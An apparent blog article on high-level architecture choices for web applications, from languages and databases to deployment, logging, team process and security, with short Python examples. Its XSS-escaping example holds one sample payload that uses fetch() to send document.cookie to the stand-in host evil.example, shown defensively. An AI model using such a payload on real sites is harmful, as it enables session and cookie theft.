Designing Web Applications: Architectural Components
What are the main considerations to think about when creating a web application? Why is the architecture in your company the way it is? What are its non-trivial parts? How should you think about the “other end”?
After working at five startups, mostly as a full-stack engineer but also as a dev lead, CTO and tech director, and after creating many side projects, I want to share my thoughts about choosing technologies and about how to think about web applications from a high-level perspective.
What are the highest-level components of a web application?
If you had to pick just 3–4 of the highest-level components of an app, what would they be?
You probably think of the back-end, the front-end, maybe the connection between them, and a DB.
When you drill down into the architecture at a higher resolution, you see many more components, and this is what I’ll review in this article. Shall we start?
First, some basic principles before getting into the technical details. In my opinion, this is the most important part of the article.
Before you start choosing technologies
Time frame for development
Do you have a specific deadline? When is it? How much time do you have to work on it, and are you the only person who will work on it? Can consultants help build it? Or maybe speed isn’t important in your case?
- Is it a startup MVP? If so, you’ll want to keep hiring in mind. Choose technologies that many people know, so that the pool of experienced candidates is as big as possible. Also choose technologies that people want to work with, so that potential candidates are excited to grow in your organization.
- Maybe it’s a side project? Then keep your long-term goals in mind: think about the next job you want to have, or a technology used at your current company that you want to master.
Knowledge in the team
If you work in a group, you’ll want to examine everyone’s current knowledge. You probably don’t want to choose only technologies that no one in the group has worked with before, because getting started would then be a big struggle.
Different products and markets have different characteristics and this might affect the choices:
- Security and regulation: maybe the product is in the health domain and stores users’ sensitive personal information. In that case you should pay extra attention to security from the very first user. Maybe you need to be GDPR compliant pretty soon? Then you might want your servers in Europe.
- Mobile vs. web: if the product will have both web and mobile versions, you might want to use React for the web front-end and React Native for mobile. You might also consider GraphQL. It lets the client request only the fields it needs, so responses are smaller, which helps when a poor connection limits bandwidth. If most of the app is front-end and there’s just a thin back-end layer around the DB, you might want to use Node for the back-end. That way the same people can work flexibly across both sides in one language.
- Continuous deployment (CD) or not: it’s considered best practice to deploy continuously (release every new working feature to production without waiting for a set “release date”). However, some products don’t allow it: games that have a specific release date, regulated health-related products that need extensive QA cycles, and more.
- How long will it live: is this a short-term project or a POC? Or is it just the beginning of a product that will change a lot following user feedback? Or is there one shot to build it, after which it will stay the way it was built?
- Who will maintain it: will it be you? If not, will you have time to onboard the maintainer(s)?
Is there a specific budget? Can it grow in the future, or is it fixed? This might affect your choice of cloud provider.
Remember: always check before using
This is the last principle to keep in mind before diving into picking technologies, and a very important one. What we know about technologies might differ from their current state. Maybe we did thorough research comparing databases half a year ago, but a month ago a killer feature was added to one of them. It’s not recommended to choose technologies without spending at least a few hours checking their latest updates. Other things change as well. A year ago I would have said that one downside of the front-end framework Vue.js was its small community, but that has changed a lot over the past year.
So now we’re ready to start.
Let’s review some key decisions you need to make when creating the back-end of a web application.
- Dynamically vs. statically typed, and type inference: one of the main questions to ask is whether we prefer a dynamically or a statically typed language, and whether we want a language that infers types. The two are correlated but not the same. Dynamically typed languages check for type errors only at run time, while statically typed languages check earlier, at compile time. That doesn’t necessarily mean the developer has to write the types; that depends on the language design. If a language determines types from context, it supports type inference. This is a big difference between languages, and people tend to feel strongly about it, but I personally think it doesn’t really matter for most projects.
- Popularity: as mentioned before, if we choose a popular language, we can hire more easily, because the pool of talent is bigger and because people will be excited to work with it. There’s another important reason to choose a popular solution: the community. Can we find answers to our questions online? Are there many posts explaining how to do things? Have many people pushed it to do complex things, driving it to evolve where needed?
- Leader / team preference: in my opinion, this will be one of the main reasons for choosing the language. If the team doesn’t like working on the codebase, motivation will drop and development will take longer.
- It’s neither permanent nor exclusive: chances are you’ll write microservices at some point, and you’ll be able to use different languages for different microservices. And you can always migrate.
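To make the dynamic vs. static distinction concrete, here is a small Python sketch (Python is dynamically typed). The type hints only document intent and are not enforced at run time. A wrong argument type is therefore caught only when the offending line actually executes. A separate static checker such as mypy could flag the bad call before running, but that is an extra tool, not the language runtime. The function names are illustrative.

```python
def total_price(price: float, quantity: int) -> float:
    # The annotations document intent, but CPython does not enforce them at run time.
    return price * quantity


def checkout(items: list[tuple[float, int]]) -> float:
    return sum(total_price(price, qty) for price, qty in items)


# Works as intended.
print(checkout([(9.99, 2), (5.0, 1)]))

# The string is not rejected when passed in; the TypeError only appears
# once total_price runs and tries to multiply a str by a float.
try:
    checkout([("9.99", 2.5)])
except TypeError as err:
    print("caught at run time:", err)
```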
Framework / server
Serverless is a model in which you don’t manage the resources of the server that runs your back-end: you don’t monitor its CPU or memory, and you don’t install it. Instead, the cloud you work with does that for you.
For example, AWS Lambda lets you write functions. You connect a function to Amazon API Gateway on one side and to a DB on the other. You don’t pay while it isn’t running (no HTTP calls), and it scales automatically: when there are many calls, AWS handles the scaling and processes all of them. It supports Java, Go, PowerShell, Node.js, C#, Python, Ruby and other languages.
Other clouds support serverless as well, with services such as Azure Functions and Google Cloud Functions.
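Going back to the AWS Lambda example, here is a minimal sketch of a Python function behind API Gateway. It assumes the Lambda proxy integration, in which the handler returns a dict with `statusCode`, `headers` and a string `body`. The `PRODUCTS` dict is a hypothetical stand-in for the DB on the other side, and the `id` query parameter is an illustrative choice. The bottom of the block calls the handler locally with a hand-built event, which is a convenient way to test handlers without deploying.

```python
import json

# Hypothetical stand-in for the database the function would normally query.
PRODUCTS = {"1": {"id": "1", "name": "Notebook", "price": 4.5}}


def lambda_handler(event, context):
    """Entry point Lambda invokes; with the proxy integration,
    `event` carries the HTTP request details."""
    params = event.get("queryStringParameters") or {}  # None when there is no query string
    product = PRODUCTS.get(params.get("id"))
    if product is None:
        return _response(404, {"error": "product not found"})
    return _response(200, product)


def _response(status, payload):
    # The proxy integration expects the body as a string, so serialize it.
    return {
        "statusCode": status,
        "headers": {"Content-Type": "application/json"},
        "body": json.dumps(payload),
    }


if __name__ == "__main__":
    # Local invocation with a hand-built event; context is unused here.
    print(lambda_handler({"queryStringParameters": {"id": "1"}}, None))
```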
A couple of years ago, people said that serverless would become stable and mature, and that most companies would migrate to this model. It did become much more stable and mature, and many companies use it for certain use cases, but I don’t know many companies that use it as a complete replacement for their servers. I think it’s good for replacing microservices that have recurring huge peaks in load and a very low load most of the time. Wait, micro what?
Microservices is an architectural style that is the opposite of a monolith. Instead of having one big server, you have many small services that communicate with each other over HTTP or through queues (queues are used in monoliths as well). This practice allows using different languages and, more importantly, scaling different parts of the application differently. While I think it’s overkill for an MVP, it will most likely be a better fit for a more mature application. So this is an example of an architectural change that becomes inevitable once the application grows.
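To illustrate services communicating through a queue, here is an in-process Python simulation. A hypothetical "orders" service publishes events to a queue, and a hypothetical "email" service consumes them on its own thread. In a real deployment the queue would be a message broker and each service a separate process. `queue.Queue` and the service names are stand-ins for illustration only. The point is that the producer doesn't know who consumes its events, so each side can be changed or scaled on its own.

```python
import queue
import threading

STOP = object()  # sentinel telling the consumer to shut down


def orders_service(bus: queue.Queue, order_ids: list[int]) -> None:
    # Publishes one event per order and returns immediately.
    for order_id in order_ids:
        bus.put({"type": "order_created", "order_id": order_id})


def email_service(bus: queue.Queue, sent: list[str]) -> None:
    # Consumes events at its own pace until it sees the sentinel.
    while True:
        event = bus.get()
        if event is STOP:
            break
        sent.append(f"confirmation for order {event['order_id']}")


bus: queue.Queue = queue.Queue()
sent: list[str] = []
consumer = threading.Thread(target=email_service, args=(bus, sent))
consumer.start()
orders_service(bus, [101, 102, 103])
bus.put(STOP)
consumer.join()
print(sent)
```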
Relational (SQL) or non-relational (NoSQL)
This might be our first question when examining databases. Relational databases store data in tables, while non-relational databases store objects (documents), trees, key-value pairs, etc. In relational databases the schema is predefined, while in non-relational ones it’s more flexible. Non-relational databases are generally considered better for large scale because they scale horizontally more easily.
But is that the right question to ask?
In my opinion, what matters more than these categories is which DB is best for each use case. For example, Elasticsearch is good for text search, Cassandra has great features for counters, and Redis is a key-value store. MongoDB is a popular NoSQL DB and a good fit when the data changes and records don’t always have the same fields. However, it might be problematic for teams with many juniors or little discipline, who might add a lot of unnecessary data to it. PostgreSQL is a popular choice for the opposite case.
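The schema difference can be seen with Python’s built-in `sqlite3` module (a relational DB). Next to it, a plain list of dicts stands in for a document store; the list is only an illustration, not how MongoDB works internally. The relational table rejects a field that isn’t in its predefined schema. The document "collection" accepts any extra field. That is both the flexibility and the discipline risk mentioned above.

```python
import sqlite3

# Relational: the schema is declared up front.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT NOT NULL)")
db.execute("INSERT INTO users (name) VALUES (?)", ("Dana",))

try:
    # 'nickname' is not part of the schema, so the DB refuses the write.
    db.execute("INSERT INTO users (name, nickname) VALUES (?, ?)", ("Avi", "A"))
    rejected = False
except sqlite3.OperationalError as err:
    rejected = True
    print("relational DB rejected it:", err)

# Document-style: each record can carry whatever fields it likes,
# including ones nobody planned for.
users_collection = [{"name": "Dana"}]
users_collection.append({"name": "Avi", "nickname": "A", "temp_flag": True})

print(rejected, len(users_collection))
```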
Replication, or creating a cluster, means keeping copies of the entire DB on several nodes. The load can then be spread across them (typically reads, and in some setups writes too), while the nodes keep each other up to date. This helps maintain high availability.
With sharding, huge tables are split across different nodes of the database cluster, so that each node holds only part of the data.
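A common way to decide which node holds which rows is hash-based sharding: hash the shard key and take the result modulo the number of shards. Below is a minimal Python sketch. It assumes a fixed shard count and a hypothetical `user_id` string as the shard key. It uses `zlib.crc32` rather than Python’s built-in `hash()`, because `hash()` of strings is randomized per process and would route the same key to different shards after a restart.

```python
import zlib

SHARD_COUNT = 4  # assumed fixed number of database nodes


def shard_for(user_id: str, shard_count: int = SHARD_COUNT) -> int:
    """Return the index of the shard that stores this user's rows."""
    # crc32 is stable across processes and machines, unlike hash() on str.
    return zlib.crc32(user_id.encode("utf-8")) % shard_count


shards: dict[int, list[str]] = {i: [] for i in range(SHARD_COUNT)}
for uid in ["alice", "bob", "carol", "dave", "erin", "frank"]:
    shards[shard_for(uid)].append(uid)

print(shards)
```

One caveat of this design: with plain modulo hashing, changing `SHARD_COUNT` remaps most keys. That is why many systems use consistent hashing or range-based sharding instead.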
Another option is to separate the database query language from the code by adding a “translation” layer (an external library, such as an ORM), which allows replacing the database without changing the code. Waterline is one example.
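The idea behind such a translation layer can be sketched in Python with a small interface and two interchangeable back ends. This is not Waterline’s API. `UserStore`, `InMemoryUserStore`, `SqliteUserStore` and `register_user` are hypothetical names. The point is that `register_user` only talks to the interface, so the database behind it can be swapped without touching the application code.

```python
import sqlite3
from typing import Optional, Protocol


class UserStore(Protocol):
    def add(self, email: str) -> int: ...
    def find(self, user_id: int) -> Optional[str]: ...


class InMemoryUserStore:
    def __init__(self) -> None:
        self._rows: dict[int, str] = {}

    def add(self, email: str) -> int:
        user_id = len(self._rows) + 1
        self._rows[user_id] = email
        return user_id

    def find(self, user_id: int) -> Optional[str]:
        return self._rows.get(user_id)


class SqliteUserStore:
    def __init__(self, path: str = ":memory:") -> None:
        self._db = sqlite3.connect(path)
        self._db.execute("CREATE TABLE IF NOT EXISTS users (id INTEGER PRIMARY KEY, email TEXT)")

    def add(self, email: str) -> int:
        cur = self._db.execute("INSERT INTO users (email) VALUES (?)", (email,))
        self._db.commit()
        return cur.lastrowid

    def find(self, user_id: int) -> Optional[str]:
        row = self._db.execute("SELECT email FROM users WHERE id = ?", (user_id,)).fetchone()
        return row[0] if row else None


def register_user(store: UserStore, email: str) -> int:
    # Application code depends only on the interface, never on SQL.
    return store.add(email.strip().lower())


for store in (InMemoryUserStore(), SqliteUserStore()):
    new_id = register_user(store, "  Dana@Example.com ")
    print(type(store).__name__, new_id, store.find(new_id))
```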
The most important thing when preparing to deploy an app with real users: configure a DB backup that runs at least once a week, make sure it works, and make sure you know how to restore from it.
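Taking a backup is only half the job; the other half is checking that the backup is actually usable. A small Python sketch using `sqlite3.Connection.backup` (available since Python 3.7) shows the pattern. It copies the live DB, then opens the copy and compares something meaningful, here the row count of a hypothetical `orders` table. For a production DB you would use that database’s own tooling (for example `pg_dump` for PostgreSQL) plus a scheduler, but the verify-after-backup step carries over.

```python
import sqlite3


def backup_and_verify(source: sqlite3.Connection, target_path: str, table: str) -> bool:
    """Copy `source` into `target_path`, then confirm the copy is readable and complete."""
    target = sqlite3.connect(target_path)
    try:
        source.backup(target)  # online copy of the whole database
        # `table` comes from our own code, never from user input.
        original = source.execute(f"SELECT COUNT(*) FROM {table}").fetchone()[0]
        copied = target.execute(f"SELECT COUNT(*) FROM {table}").fetchone()[0]
        return original == copied
    finally:
        target.close()


live = sqlite3.connect(":memory:")
live.execute("CREATE TABLE orders (id INTEGER PRIMARY KEY, total REAL)")
live.executemany("INSERT INTO orders (total) VALUES (?)", [(10.0,), (25.5,)])
live.commit()
print(backup_and_verify(live, ":memory:", "orders"))  # True
```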
REST vs. GraphQL
REST is a convention for designing APIs as HTTP calls with methods like POST and GET, each used in specific cases: POST to create a new object (with a JSON object in its body), GET to fetch data from the server, and so on. GraphQL is a newer way to design APIs, developed by Facebook. It allows fetching selected parts of different objects from the server in a single call, which makes calls leaner. It’s especially good for mobile apps that might be limited by bandwidth.
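Both styles usually travel over plain HTTP, so the difference shows up in how requests are shaped. The Python sketch below builds, but does not send, requests with the standard library’s `urllib.request`. It contrasts two REST calls to resource endpoints (plus a REST create) with a single GraphQL POST. The GraphQL body carries a `query` that names only the fields the screen needs. The host, endpoints and schema fields (`user`, `orders`, `total`) are hypothetical.

```python
import json
import urllib.request

BASE = "https://api.example.com"  # hypothetical API host

# REST: one endpoint per resource; each response returns the full object.
get_user = urllib.request.Request(f"{BASE}/users/42", method="GET")
get_orders = urllib.request.Request(f"{BASE}/users/42/orders", method="GET")

# REST create: POST with a JSON object in the body.
create_order = urllib.request.Request(
    f"{BASE}/orders",
    data=json.dumps({"userId": 42, "total": 19.9}).encode("utf-8"),
    headers={"Content-Type": "application/json"},
    method="POST",
)

# GraphQL: a single endpoint; the query selects exactly the fields needed
# from several related objects in one round trip.
graphql_query = """
query {
  user(id: 42) {
    name
    orders { id total }
  }
}
"""
graphql_call = urllib.request.Request(
    f"{BASE}/graphql",
    data=json.dumps({"query": graphql_query}).encode("utf-8"),
    headers={"Content-Type": "application/json"},
    method="POST",
)

for req in (get_user, get_orders, create_order, graphql_call):
    print(req.get_method(), req.full_url)
# Sending would be urllib.request.urlopen(req); omitted because the host is fictional.
```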
HTTP vs. WebSockets
WebSockets are the server’s “push notifications”. They’re useful when the server needs to notify the client about new information, for example emails received from other users. Instead of the client polling the server every x seconds, the server can announce immediately that new data is available, and also send it. WebSockets are great and usually needed eventually, but I think implementing them from the beginning is over-engineering. It’s one of those things we know we’ll need to add later but still postpone to a more mature stage of the project.
Front End Decisions
MVC vs. SPA vs. SSR apps
- Model View Controller (MVC) was the popular front-end architecture ten years ago. In this architecture, the server sends HTML pages to the browser with the relevant data already inside them. The pages are rendered on the server using template engines.
- A Single Page Application (SPA) is the most popular way to build front-end applications today. The front-end code is downloaded to the browser in full, often from a different cloud than the server. It communicates with the server only in JSON objects, updating and fetching data rather than HTML files. This way the front-end can keep a state throughout the use of the app, instead of reloading it every time the server sends a new HTML page (see the state management item below).
- SSR (server-side rendering), or universal/isomorphic apps: a mix of an SPA and a server that serves HTML pages. It’s good when the first page has to load really quickly or when you need advanced SEO. But these are usually needed for marketing websites, which in most cases you wouldn’t build as an SPA anyway, but with Wix or WordPress.
- React vs. Angular vs. Vue vs. Web Components: all four are modern ways to build front-end applications. “The front-end wars” have been going on for years, with people trying to decide which platform to migrate to. Vue was heavily used in the East, so a few years ago I wouldn’t have recommended it because of its small Western community, but this has changed over the past couple of years. I love React’s documentation, its diverse approach to developer teams and its ecosystem. Angular is supposed to be a better fit for large organisations, but I don’t have personal experience with it. Web Components are a platform-agnostic way to build front-end apps that is (supposedly) here to stay, even after other platforms stop being supported.
- State management: front-end components need to share information with one another, and that information is kept in a global state. This state is hard to manage, and there are a few great solutions for it today. The most common one is Redux, which became unnecessary for many React apps with the release of the Hooks API. Alternatives include MobX and Apollo, a GraphQL library. Global variables can also be saved in session storage / local storage, but that’s recommended only for very specific uses, as you can read here.
- UI components (Bootstrap / Semantic UI / Material Design / Ant Design): it’s not recommended to create all of the app’s UI from scratch, even at a big company. Rely on one of these libraries and customize it. To choose between them, consult a designer! You want the library that is most similar to the design you need. Also check how easy it is to customize, because some of them aren’t.
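The pattern behind the state management item, popularised by Redux, is a single store whose state changes only through dispatched actions. A pure reducer function handles each action. Here it is as a minimal Python sketch, for consistency with the other examples. `Store`, `reducer` and the action names are hypothetical, and this is not Redux’s actual API.

```python
from typing import Any, Callable

State = dict[str, Any]
Action = dict[str, Any]


def reducer(state: State, action: Action) -> State:
    # Pure function: returns a new state instead of mutating the old one.
    if action["type"] == "cart/add":
        return {**state, "cart": state["cart"] + [action["item"]]}
    if action["type"] == "user/login":
        return {**state, "user": action["name"]}
    return state  # unknown actions leave the state unchanged


class Store:
    def __init__(self, reducer: Callable[[State, Action], State], initial: State) -> None:
        self._reducer = reducer
        self._state = initial
        self._listeners: list[Callable[[State], None]] = []

    def get_state(self) -> State:
        return self._state

    def subscribe(self, listener: Callable[[State], None]) -> None:
        # Components register here to re-render when shared state changes.
        self._listeners.append(listener)

    def dispatch(self, action: Action) -> None:
        self._state = self._reducer(self._state, action)
        for listener in self._listeners:
            listener(self._state)


store = Store(reducer, {"user": None, "cart": []})
store.subscribe(lambda s: print("header sees cart size", len(s["cart"])))
store.dispatch({"type": "user/login", "name": "Dana"})
store.dispatch({"type": "cart/add", "item": "book"})
print(store.get_state())
```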
Deployment of SPA
Here are some of the options available for deploying SPA applications:
- S3: an AWS storage service that behaves like folders and can be configured to serve a domain, so that browsing to that domain downloads the front-end code and runs it.
- Netlify: my personal favourite. It’s a cloud for deploying static apps that can auto-deploy different branches to auto-generated domain names, keeps deployment history, and has a comfortable pricing model.
- GitHub pages: another popular alternative.
Here are a few considerations when choosing which cloud to use. Keep in mind it’s not forever. You can always migrate. There’s a cost to migration, but there’s also a cost to postponing a decision.
Check the pricing model and look out for issues such as: does the free tier include restarts you can’t afford, effectively preventing you from using it?
Is it popular among companies that do similar things to what you do? What kinds of solutions is it built for, or does it excel at?
Does it have clear documentation?
Is it easy to control security aspects in it?
Server location / Regulation
Does it have physical servers in Europe? GDPR might limit you to that. Or maybe all your clients are in Asia, and you want your servers there rather than in America, so that response times are shorter. Alternatively, you can keep the servers in America and use a CDN service.
You can use more than one!
You don’t have to work with just one cloud, you can use multiple clouds if it creates the best solution for you.
Notice configuration differences between the clouds. For example, in AWS you have to configure a load balancer if you have more than one server node, while Heroku lets you run multiple nodes without configuring one.
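What a load balancer does in front of several nodes can be sketched in a few lines of Python with the simplest strategy, round robin. The node addresses are hypothetical. Managed load balancers add health checks, connection draining and smarter strategies; this only shows the core idea of spreading requests evenly across nodes.

```python
import itertools
from typing import Iterable


class RoundRobinBalancer:
    """Hands out backend nodes in rotation so each gets an equal share of requests."""

    def __init__(self, nodes: Iterable[str]) -> None:
        self._nodes = list(nodes)
        if not self._nodes:
            raise ValueError("at least one node is required")
        self._cycle = itertools.cycle(self._nodes)

    def pick(self) -> str:
        return next(self._cycle)


balancer = RoundRobinBalancer(["10.0.0.1:8080", "10.0.0.2:8080", "10.0.0.3:8080"])
for request_id in range(5):
    print(f"request {request_id} -> {balancer.pick()}")
```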
How important is it that your local environment is similar to the cloud environment? Consider that together with how complex it is to spin up a new local environment and whether you need several environments on the same computer. These factors will determine whether you should use Docker from the beginning of the project.
How to deploy
When the project grows and more people join, it’s good to use a deployment tool like Ansible to manage the different steps of the process. But at the beginning of a project you usually don’t need it.
You have the production environment and your local development environment. You can have a few more environments:
- staging, which is configured exactly like production and exists for load tests and/or sanity checks;
- ad hoc environments for git branches, to test features outside developers’ local environments;
- a demo environment for demoing specific features with specific configurations.
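One common way to keep these environments apart is to select the configuration with an environment variable. Here is a minimal Python sketch, assuming a hypothetical `APP_ENV` variable and made-up hostnames and settings. Staging is derived from production, so it stays configured the same way except for what must differ.

```python
import os

# Hypothetical settings; hostnames are placeholders, not real infrastructure.
PRODUCTION = {
    "debug": False,
    "db_url": "postgres://prod-db.internal/app",
    "log_level": "INFO",
}

CONFIGS = {
    "development": {"debug": True, "db_url": "sqlite:///local.db", "log_level": "DEBUG"},
    "production": PRODUCTION,
    # Staging mirrors production; only the database differs.
    "staging": {**PRODUCTION, "db_url": "postgres://staging-db.internal/app"},
    # Demo mirrors production with its own DB and a hypothetical feature flag.
    "demo": {**PRODUCTION, "db_url": "postgres://demo-db.internal/app", "feature_x": True},
}


def load_config() -> dict:
    env = os.environ.get("APP_ENV", "development")
    if env not in CONFIGS:
        raise RuntimeError(f"unknown APP_ENV: {env!r}")
    return {"env": env, **CONFIGS[env]}
```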
Build & Test platform
I think it’s better to configure a CI/CD platform, with test infrastructure and a few basic tests, pretty close to the beginning of the project. Three main CI/CD platforms are Jenkins, Travis CI and CircleCI. Jenkins has been around for over 10 years, while Travis CI and CircleCI are more modern.
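"A few basic tests" can be as small as the Python `unittest` sketch below, which a CI job could run with `python -m unittest`. `healthcheck` and `apply_discount` are hypothetical application functions, included only so the file is self-contained.

```python
import unittest


def healthcheck() -> dict:
    # Hypothetical app function; a real one might also ping the DB.
    return {"status": "ok"}


def apply_discount(price: float, percent: float) -> float:
    if not 0 <= percent <= 100:
        raise ValueError("percent must be between 0 and 100")
    return round(price * (1 - percent / 100), 2)


class SmokeTests(unittest.TestCase):
    def test_healthcheck(self) -> None:
        self.assertEqual(healthcheck()["status"], "ok")

    def test_discount(self) -> None:
        self.assertEqual(apply_discount(200.0, 25), 150.0)

    def test_discount_rejects_bad_input(self) -> None:
        with self.assertRaises(ValueError):
            apply_discount(10.0, 120)
```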
Logs / Monitoring Decisions
In my opinion, logs, like a certain amount of unit tests, are important almost from the very beginning. They’ll help you debug production when an unexpected need arises, and gather some basic statistics.
I like to separate the front-end logs from the server logs. That way, if certain parts of the server stop working, front-end logs can still reach the external system I use to collect them. But at the beginning it’s also okay to send the front-end logs through the server to the same place.
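For the server side, Python’s standard `logging` module is enough to get started. The sketch below configures a timestamped format and logs a request summary, plus an error with its traceback. The `key=value` style makes basic statistics easy to extract later. The logger name `checkout` and the `charge` function are illustrative. In production you would typically add a handler that ships these records to your log collection system.

```python
import logging

logging.basicConfig(
    level=logging.INFO,
    format="%(asctime)s %(levelname)s %(name)s %(message)s",
)
log = logging.getLogger("checkout")


def charge(order_id: int, amount: float) -> bool:
    log.info("charging order_id=%s amount=%.2f", order_id, amount)
    try:
        if amount <= 0:
            raise ValueError("amount must be positive")
        return True
    except ValueError:
        # exception() logs at ERROR level and appends the traceback.
        log.exception("charge failed order_id=%s", order_id)
        return False


charge(1, 30.0)
charge(2, -5.0)
```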
When should you get an email? When should you get a phone call?
These are the most important security issues to take into consideration when creating a new web project:
Prevent XSS attacks
Cross-Site Scripting (XSS) is the injection of malicious code through the front end. Here’s a cheatsheet with great explanations about it, and a fantastic summary from this link. Untrusted data is, for example, data that comes directly from an input field without being escaped.
On a Node server, don’t rely on strict mode for security. Use ESLint with the security plugin to help make sure you don’t expose this vulnerability by mistake.
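The core defence is to escape untrusted data before it goes into HTML. Here is a minimal Python sketch that renders a comment on the server using the standard library’s `html.escape` and `string.Template`. The template and payload are illustrative. Modern template engines and front-end frameworks escape by default, so this mostly matters when you bypass them.

```python
import html
from string import Template

PAGE = Template('<div class="comment"><b>$author</b>: $body</div>')


def render_comment(author: str, body: str) -> str:
    # Escape every piece of untrusted input before it enters the HTML.
    # quote=True also escapes " and ' so values are safe inside quoted attributes.
    return PAGE.substitute(
        author=html.escape(author, quote=True),
        body=html.escape(body, quote=True),
    )


malicious = "<script>fetch('https://evil.example/?c=' + document.cookie)</script>"
print(render_comment("mallory", malicious))
```

`html.escape` only covers HTML text and quoted attribute values. Data placed inside `<script>` blocks, URLs or CSS needs context-specific encoding.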
Prevent DoS attacks
Denial of Service (DoS) attacks happen when many clients hit your APIs at the same time and overwhelm your servers. You can configure rate limiting to mitigate that. Read more here.
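Rate limiting is usually configured in an API gateway, reverse proxy or framework middleware rather than written by hand. Still, the common token-bucket algorithm behind many of them is short. Below is a Python sketch, assuming one bucket per client keyed by IP address. The capacity and rate are arbitrary, and the clock is injectable so the behaviour can be tested deterministically.

```python
import time
from typing import Callable, Dict


class TokenBucket:
    """Allows bursts up to `capacity`, refilling at `rate` tokens per second."""

    def __init__(self, capacity: float, rate: float,
                 clock: Callable[[], float] = time.monotonic) -> None:
        self.capacity = capacity
        self.rate = rate
        self._clock = clock
        self._tokens = capacity
        self._last = clock()

    def allow(self) -> bool:
        now = self._clock()
        # Refill in proportion to elapsed time, never above capacity.
        self._tokens = min(self.capacity, self._tokens + (now - self._last) * self.rate)
        self._last = now
        if self._tokens >= 1:
            self._tokens -= 1
            return True
        return False  # the caller would respond with HTTP 429 Too Many Requests


buckets: Dict[str, TokenBucket] = {}


def is_allowed(client_ip: str) -> bool:
    if client_ip not in buckets:
        buckets[client_ip] = TokenBucket(capacity=5, rate=1.0)
    return buckets[client_ip].allow()
```

A per-process dict only works on a single server. With several nodes, the counters usually live in a shared store such as Redis.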
Don’t save raw passwords in the DB
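If you manage users’ passwords on your own, save a hash of each password instead of the password itself. A hash is a mathematical function that you run on the password, and it’s (practically) impossible to recover the password from its output. Running the hash function on the same input always gives the same value. That lets you compare the password a user enters with the hash you saved when they first signed up. In practice, combine each password with a unique random salt stored next to the hash. Also use a deliberately slow password-hashing function such as bcrypt, scrypt, Argon2 or PBKDF2 rather than a plain fast hash, so that precomputed tables and brute force become impractical.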
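Here is a minimal Python sketch of salted password hashing using the standard library’s PBKDF2 (`hashlib.pbkdf2_hmac`). The storage format (`iterations$salt$hash`) and the iteration count are assumptions for illustration; check current guidance before picking parameters. Because each user gets a random salt, verification recomputes the hash with the stored salt rather than hashing the input afresh.

```python
import hashlib
import hmac
import secrets

ITERATIONS = 600_000  # deliberately slow to make brute force expensive


def hash_password(password: str) -> str:
    salt = secrets.token_bytes(16)  # unique per user, stored alongside the hash
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return f"{ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    iterations, salt_hex, digest_hex = stored.split("$")
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    # Constant-time comparison avoids leaking how many bytes matched.
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


stored = hash_password("correct horse battery staple")
print(verify_password("correct horse battery staple", stored))  # True
print(verify_password("wrong guess", stored))  # False
```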
Don’t save keys in the code
If you commit a configuration file with keys, the only way to remove it from the codebase is to delete the commit from history and force-push master (provided no other branches contain the problematic commit). People try to avoid force-pushing to master at all costs, and it’s not always possible to remove just one problematic commit. So don’t save keys in the code. Save them in environment variables, or in a config file that you exclude with a .gitignore file.
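Reading keys from the environment keeps them out of the repository. Below is a minimal Python sketch; `PAYMENT_API_KEY` and `MissingSecretError` are hypothetical names. Failing fast with a clear message at startup when a key is missing is a design choice. It beats discovering the problem on the first production request that needs the key.

```python
import os


class MissingSecretError(RuntimeError):
    pass


def require_secret(name: str) -> str:
    """Read a secret from the environment, failing fast if it isn't set."""
    value = os.environ.get(name)
    if not value:
        raise MissingSecretError(f"environment variable {name} is not set")
    return value


# At startup (the variable is set by the deployment, never committed):
# PAYMENT_API_KEY = require_secret("PAYMENT_API_KEY")
```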
Use unique, strong passwords for production, with 2FA
The easiest way is to have the team use 1Password, LastPass, or a similar password manager.
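For context on the 2FA part: most authenticator apps implement time-based one-time passwords (TOTP, RFC 6238). The server and the app share a secret, and each derives a short code from the current 30-second time window. Below is a Python sketch of the algorithm for illustration, checked against the RFC’s published test vector. In practice, rely on your identity provider or a maintained library rather than rolling your own.

```python
import hashlib
import hmac
import struct
import time
from typing import Optional


def totp(secret: bytes, at: Optional[float] = None, digits: int = 6, step: int = 30) -> str:
    """RFC 6238 TOTP using HMAC-SHA1, the common default."""
    counter = int((time.time() if at is None else at) // step)
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F  # dynamic truncation, as defined in RFC 4226
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


# Test vector from RFC 6238, Appendix B (ASCII secret "12345678901234567890").
print(totp(b"12345678901234567890", at=59, digits=8))  # 94287082
```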
How will the team work?
Here’s a post I wrote about Git Flow. TL;DR: most likely you’ll want a protected master branch, so that only approved PRs that pass the unit tests can be merged into it. Each person works on their own branch, named like ‘feature/my-feature’, rebases it on master, and merges it when it’s ready. Others can only comment; they can’t commit to someone else’s branch without coordinating. There’s no single right git flow; it depends on the nature of the product.
Depending on the technologies you use, sooner or later you’ll have to update your libraries. I also mentioned this at the end of my Git Flow post.
Sprint planning / tasks management
What tool are you going to use for task management? How long is a sprint? Does it have a predefined length? I find it comfortable to plan sprints of 1–2 weeks, with tasks of about two days inside them. Estimates tend to average out. If we need to coordinate a deadline with a client, I add a buffer so that there’s an internal deadline and an external one. The most important thing about time estimates, which are always guesses, is transparency and raising flags in time.
Use the README. You’ll also want Drive, Quip or another platform for documents. Try to keep it organised from the beginning, and encourage everyone to use it a lot, including by setting an example yourself.
You probably want to create a Slack workspace and a Gmail account. On Slack, create a channel for each conversation context, so that it’s easy to search and scroll.
Don’t forget to choose and buy a domain; there are many companies you can buy one through.
You might want to use an external service to manage your users, like Auth0.
The one crucial mistake I’ve seen people make is over-engineering. Keep it simple and don’t overdo it. Start small and grow the architecture with the business, but pay attention to quality aspects like tests and processes from the beginning. Skip: analytics, regulation, caching, queues, a demo environment, Kubernetes, Docker. Balance the research: don’t build POCs for months. Most of the time it’s better to just release something and then iterate on it.
How to become familiar with all of this
If you want to feel comfortable with all the knowledge mentioned here — it’s possible, and even easy!
Do side projects
Go to a hackathon, or set aside 2–3 hours every week, and build a small app end-to-end.
Work at different, innovative companies
